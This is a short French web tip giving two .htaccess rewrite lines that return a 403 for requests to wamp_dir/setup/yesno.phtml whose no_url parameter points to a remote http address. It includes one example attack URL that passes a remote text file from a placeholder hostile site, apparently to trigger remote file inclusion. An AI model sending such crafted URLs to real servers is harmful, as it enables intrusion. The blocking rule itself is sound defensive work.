HTACCESS

Empeche le hack via wamp_dir/setup/yesno.phtml

Les failles de sécurité sont nombreuses avec la multiplication des CMS, blogs, forums et des addons.

Ce nouvel exemple exploite le paramètre no_url. Pour éviter les mauvaises surprises si vous utilisez ce script il est indispensable d'ajouter deux petites lignes dans le fichier .htaccess pour bloquer des tentatives de piratage avec des url du type http://www.example.com/wamp_dir/setup/yesno.phtml?no_url=http://www.sitepourri.com/page.txt?

Un code retour 403 sera ainsi renvoyé pour interdire l'accès à ces pages.

RewriteCond %{QUERY_STRING} ^(.*&)?no_url=http://
RewriteRule ^(.*/)?wamp_dir/setup/yesno.phtml - [F,L]
PHP